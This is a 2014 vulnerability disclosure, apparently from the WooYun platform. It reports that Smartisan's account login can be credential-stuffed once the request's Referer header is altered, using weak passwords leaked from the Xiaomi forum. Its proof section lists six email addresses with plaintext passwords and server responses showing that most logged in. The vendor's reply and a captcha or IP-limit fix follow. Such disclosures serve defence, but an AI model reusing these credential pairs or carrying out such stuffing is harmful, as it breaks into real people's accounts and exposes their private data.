2014-05-22:细节已通知厂商并且等待厂商处理中
2014-05-22:厂商已经确认,细节仅向厂商公开
2014-06-01:细节向核心白帽子及相关领域专家公开
2014-06-11:细节向普通白帽子公开
2014-06-21:细节向实习白帽子公开
2014-07-06:细节向公众公开
我不是为了黑你,我就是认真
详细说明:锤子科技官网账号登录是http get请求,只要修改http请求头refer为http://preorder.smartisan.com/ 便可以实现正常请求,手头有小米论坛泄露的8万弱口令账号,自己写程序撞库,获得了几个可以登录的。拥有泄露互联网密码大数据的可以获得不少账号了。
漏洞证明:imjax@qq.com 7758521
angular.callbacks._0({"errno":0,"data":{"uid":1064383}});
aalmost@163.com abc123456
angular.callbacks._0({"errno":0,"data":{"uid":1084381}});
下面账号可以登录的吧
hailigao@gmail.com 123123
angular.callbacks._0({"errno":0,"data":{"uid":1021306}});
362301960@QQ.com 12345678
angular.callbacks._0({"errno":0,"data":{"uid":1035245}});
tiane12@jnnd.com 123456
angular.callbacks._0({"errno":1501,"data":{"uid":1047147,"captcha":"https://account.smartisan.com/v2/users/1047147/captcha/"}});
jing_ouyang@hotmail.com 123456
angular.callbacks._0({"errno":0,"data":{"uid":1061131}});修复方案:
加图片验证码,或者ip限制
版权声明:转载请注明来源 寒江不钓@乌云 漏洞回应 厂商回应:危害等级:中
漏洞Rank:7
确认时间:2014-05-22 18:11
厂商回复:您好,感谢您发现的这个问题。这虽然是业内同行造成的隐患,但对我们和我们的用户仍然重要。我们将在注册页面提醒用户,尽量不要使用在别家网站使用的密码,并定期更换,来解决这个问题可能造成的隐患。我们也有输入错三次密码就弹出验证码的机制。非常感谢。
最新状态:2014-05-22:IP限制也加入了。